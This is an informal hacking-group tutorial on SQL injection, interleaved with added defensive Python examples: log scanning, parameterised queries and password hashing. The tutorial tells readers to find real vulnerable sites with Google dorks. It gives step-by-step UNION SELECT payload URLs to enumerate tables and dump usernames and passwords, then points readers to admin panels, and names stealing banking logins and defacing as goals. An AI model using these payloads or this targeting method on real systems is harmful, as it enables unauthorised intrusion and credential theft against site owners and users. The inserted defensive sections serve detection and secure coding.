
Basics of SQLi

Prepared by Tatsumi (Xavier)



Disclaimer
This guide should be used for educational
and completely legal purposes only. I am
not responsible for anything that will
happen to you due to this guide.
Sorry if my English gives you a nosebleed, haha :P
What is SQL?
To put it simply, SQL is the language used to manage a database, and
MySQL is one of the most common database servers that speak it. Now if
you can access this database you can do some pretty cool stuff like get
login credentials for banking or get the admin account for defacing. You
can do pretty much anything you want once you have accessed the admin
panel.

SQL manages data in columns, rows, tables and the like, so we will be
taking a look at them.
What you will need
A computer or laptop
Access to the internet
Something to protect you like VPN or TOR
Patience
Even More Patience
The ability to try again without giving up

You should be good if you have these. Oh and I forgot a keyboard.
Getting Started
Before we can hack, we need to find a target. We can do that with Google
and Google dorks. Google dorks are little search operators that help you
look for a site with the vulnerability. Here are a few, but there are
quite a few Google dorks out there.
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
Enter only one of these in Google search.

Once you find a target, we need to know if it's vulnerable to a MySQL
injection. Here is a sample URL:
http://testsite.org/article.php?id=291
Now we add an apostrophe to the end of the URL like this:
http://testsite.org/article.php?id=291'
then press enter. If an error message like "You have an error in your
SQL syntax" appears on the website then it is vulnerable! Now we need
to find the number of columns the site has. This is also easy. First
remove the apostrophe from the URL, then press space and type in
order by 1 (without the quotation marks) so it will look like:
http://testsite.org/article.php?id=291 order by 1

Keep incrementing the number until you see an error like the one in
the screenshot below. The site should look normal for the other
numbers that are within the column range.
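From the other side of the wire, the apostrophe test and the climbing "order by N" requests described above are exactly what a web-server log shows while a site is being probed. The following Python is an added example, not part of this tutorial: it parses a few constructed Apache-style access-log lines (sample IPs and timestamps are made up), URL-decodes each query string and flags the indicators this tutorial relies on (a stray quote, order by N, union ... select, information_schema / @@version / database()). The log format, indicator names and function names are assumptions for the demo.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (Apache combined-style). The first
# client walks through the probing steps described in the tutorial; the
# second is an ordinary visitor. None of these addresses are real hosts.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /article.php?id=291 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /article.php?id=291' HTTP/1.1" 500 312
203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /article.php?id=291%20order%20by%201 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2023:13:55:48 +0000] "GET /article.php?id=291%20order%20by%2010 HTTP/1.1" 500 312
203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /article.php?id=-291%20union%20all%20select%201,2,@@version,4 HTTP/1.1" 200 4870
198.51.100.7 - - [10/Oct/2023:13:57:01 +0000] "GET /article.php?id=12 HTTP/1.1" 200 4990
"""

# Minimal parser for the fields we need: client IP, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators that match the probing steps in the tutorial. Names are ours.
INDICATORS = {
    "quote":        re.compile(r"'"),
    "order_by":     re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.I),
    "schema_probe": re.compile(r"information_schema|@@version|database\(\)", re.I),
}


def decode_query(target):
    """Return the URL-decoded query string; decode repeatedly (bounded) so
    double-encoded payloads such as %2527 are normalised to a plain quote."""
    query = urlsplit(target).query
    for _ in range(3):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return query


def scan_log(text):
    """One finding per request whose query string carries an indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip it
        query = decode_query(m["target"])
        hits = [name for name, rx in INDICATORS.items() if rx.search(query)]
        if hits:
            findings.append({
                "ip": m["ip"],
                "status": int(m["status"]),
                "query": query,
                "indicators": hits,
            })
    return findings


def probing_sources(findings, min_requests=2):
    """Clients with several flagged requests: a probe, not a one-off typo."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= min_requests)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f["ip"], f["status"], f["indicators"], f["query"])
    print("probing sources:", probing_sources(found))
```

The 500 responses sitting next to the flagged queries are the server-side echo of the "You have an error in your SQL syntax" message the tutorial looks for; a sequence of flagged requests from one client with alternating 200/500 results is the signature of column counting.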

This is how it should look:

Remember that it will not always be 10, since the number varies from
site to site. For now we will use the example 10. Since the error
occurred when we put order by 10, that means there is no 10th column
and there are only 9 columns. Take note of the number of columns;
remember this number changes from site to site. Now do this. We
need to know which column is vulnerable to an injection.
http://testsite.org/article.php?id=-291 union all select 1,2,3,4,5,6,7,8,9
Do exactly what I did, including the dash between the equals sign and
the number. Change the 1-9 to match the number of columns you have.
For example, if you have 6 columns then you do union all select
1,2,3,4,5,6. By doing this, numbers should pop out on the web page.
Take note of all the numbers that you see. In my case the numbers
that showed up are 3 and 4, but they might differ for you. Now we
need to find the SQL database version. If it is above 5 then we can
continue. Do this by replacing ONE of the numbers that you see
with @@version. So your URL will look like this:
http://testsite.org/article.php?id=-291 union all select 1,2,@@version,4,5,6,7,8,9
So if you have 5 columns and the numbers that pop out are 1 and 2,
you can choose either union all select @@version,2,3,4,5 or
union all select 1,@@version,3,4,5, as long as you replace one of
the numbers that pop out. It should look like this:

In my case that is the version. As long as it is above 5 you are good
to go. Now we need to find the main database. To do this, replace
@@version with concat(database()). It should look like this:
In my case the main database name is flasin_sparkms. Take note of
whatever database name you got; this is vital for completing the SQL
injection. Now we need to show the tables the database has. We can
do this by replacing concat(database()) with group_concat(table_name),
but don't press enter yet, we still need to add some black magic to
the URL. At the end of the URL, add this text:
from information_schema.tables where table_schema=database()
Your URL should look like this:
http://testsite.org/article.php?id=-291 union all select
1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where
table_schema=database()
Press enter and it should look like this:

Now most of these tables are useless, but one catches the eye: the
users table. We want to access that. It's not always called users; it
might be user or userinfo or any similar name. Now we want to enter
the table, but first you need to do something. We need the
hexadecimal form of the chosen table name. You can google TextToHex
and enter your text for hexing. users in hex form is 7573657273, but
if users is not the table name then just convert it yourself. Now
change group_concat(table_name) to group_concat(column_name), change
information_schema.tables to information_schema.columns, change
table_schema to table_name and change database() to 0x(your hex
here) without the parentheses, e.g. 0x7573657273. Then hit enter and
it should look like this:

Again, whatever you see differs from website to website.
Now you should see two very interesting things: username and
password. We want that info. Remember we have three key pieces of
information by this point: the database name, which is
flashin_sparkms for me; the main table, which is users; and two
column names, which are username and password. Put them together
like this:
union all select group_concat(contentName),2,3,4,5,6,7,8,9
from databaseName.mainTable
Replace contentName, databaseName and mainTable (shown in red in the
original) with your own data. You will receive the username list with
contentName = username and the password list with contentName =
password. The username list should look like this.
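Everything from the apostrophe test to the final dump above only works because article.php pastes the id parameter straight into its SQL string. The following Python/sqlite3 program is an added example, not code from this tutorial, that rebuilds that vulnerable query next to the fixed version a developer should ship. The schema, rows, and function names (fetch_article_vulnerable, fetch_article_safe, probe_result) are constructed for the demo, and the stored password value is a placeholder, not a hash. Fed the same probes the tutorial uses, the vulnerable function errors on the apostrophe and on an out-of-range order by, and returns the users rows for the union; the fixed one rejects every non-integer id before any SQL is built, and binds the value so the database never parses it as SQL.

```python
import sqlite3


def build_sample_db():
    """Constructed sample data: an articles table the page reads from and a
    users table holding credentials. Values are made up for the demo."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO articles VALUES (291, 'Hello', 'First post');
        INSERT INTO users VALUES (1, 'admin', 'not-a-real-hash');
    """)
    return conn


def fetch_article_vulnerable(conn, raw_id):
    """Mirrors article.php?id=...: the raw parameter is pasted into the SQL,
    so whatever follows the number becomes part of the statement."""
    sql = f"SELECT id, title, body FROM articles WHERE id={raw_id}"
    return conn.execute(sql).fetchall()


def fetch_article_safe(conn, raw_id):
    """Hardened form: validate the type, then bind the value as a parameter.
    int() raises ValueError for anything that is not a plain integer, and the
    driver sends the bound value separately from the SQL text."""
    article_id = int(raw_id)
    sql = "SELECT id, title, body FROM articles WHERE id=?"
    return conn.execute(sql, (article_id,)).fetchall()


def probe_result(conn, fetch, raw_id):
    """Run one fetch function against one input and report what happened as
    ('rows', rows) or ('error', exception class name), so both versions can be
    compared on identical input."""
    try:
        return ("rows", fetch(conn, raw_id))
    except (sqlite3.Error, ValueError) as exc:
        return ("error", type(exc).__name__)


# The same inputs the tutorial walks through, in the order it uses them.
PROBES = [
    "291",                                                   # normal request
    "291'",                                                  # apostrophe test
    "291 order by 4",                                        # one past the 3 real columns
    "-291 union all select 1,username,password from users",  # column-matched union
]


if __name__ == "__main__":
    db = build_sample_db()
    for raw in PROBES:
        print(f"{raw!r:60} vulnerable -> {probe_result(db, fetch_article_vulnerable, raw)}")
        print(f"{'':60} safe       -> {probe_result(db, fetch_article_safe, raw)}")
```

The error the vulnerable version throws on the apostrophe is the sqlite equivalent of the "You have an error in your SQL syntax" message the tutorial looks for; a production page should also never render driver error text to the visitor, which removes the signal the column-counting step depends on.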

Now you might find passwords like these:

That means they are hashed. The passwords are hashed with MD5 and
can only be recovered if you can crack the hash. There is a VERY
SMALL chance that you will be able to do this using online
"decryptors" (hash lookup sites), and I don't have much knowledge of
cracking. If you see this then GG, move on to the next site. But if
you do get their passwords, then NICE! You can now log in to the
admin panel!
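The hashes above are the last line of defence once the table has leaked, and unsalted MD5 is a weak one: it is fast, and two users with the same password get the same stored value, so a dump alone reveals who shares a password. The Python below is an added example, not part of this tutorial, that puts the MD5 storage the page describes next to a salted PBKDF2-HMAC-SHA256 scheme from the standard library, plus a small check that finds shared passwords from stored values alone. The storage format (algo$iterations$salt$digest), the usernames and the passwords are constructed for the demo.

```python
import hashlib
import hmac
import os
from collections import defaultdict


def md5_store(password):
    """Unsalted MD5, as in the dump the tutorial describes: a fast hash that is
    identical for identical inputs, so equal passwords are visible in a leak."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def pbkdf2_store(password, iterations=600_000, salt=None):
    """Salted, iterated PBKDF2-HMAC-SHA256 (Python stdlib). A fresh random salt
    per user means equal passwords produce different stored values, and the
    iteration count makes each guess expensive. Format is our own:
    algo$iterations$salt_hex$digest_hex."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def pbkdf2_verify(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algo, iterations, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False  # malformed record
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


def shared_password_groups(records):
    """records: iterable of (username, stored_value). Returns the groups of users
    whose stored value is byte-for-byte identical, which with unsalted MD5 means
    they share a password."""
    by_value = defaultdict(list)
    for user, stored in records:
        by_value[stored].append(user)
    return [users for users in by_value.values() if len(users) > 1]


if __name__ == "__main__":
    # Constructed sample accounts; two of them reuse the same password.
    accounts = [("alice", "summer2023"), ("bob", "summer2023"), ("carol", "correct-horse")]
    md5_records = [(u, md5_store(p)) for u, p in accounts]
    pb_records = [(u, pbkdf2_store(p)) for u, p in accounts]
    print("shared with MD5:   ", shared_password_groups(md5_records))
    print("shared with PBKDF2:", shared_password_groups(pb_records))
    print("login ok:", pbkdf2_verify("summer2023", pb_records[0][1]))
```

The iteration count is a parameter so the demo stays quick; for real storage keep it high and, where the dependency is acceptable, prefer a memory-hard function such as scrypt or Argon2 over PBKDF2.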
Finding the Admin Panel
This can sometimes be very easy or very hard. Usually the login panel
is the home page's URL with /admin or /login, or those with .php. An
easier method would be using an Admin Page Finder or a scanner of
sorts. If you have logged in, feel free to mess around with the site.
Thank you very much!
Next tutorial I will be talking about XSS (Cross Site Scripting) and
CSRF (Cross Site Request Forgery). Please pin this post so all the
members can see it. Please support by liking and giving comments and
recommendations! I love hearing feedback.
If you have any questions, don't hesitate to ask me on the group or
add me on FB. Happy hacking!
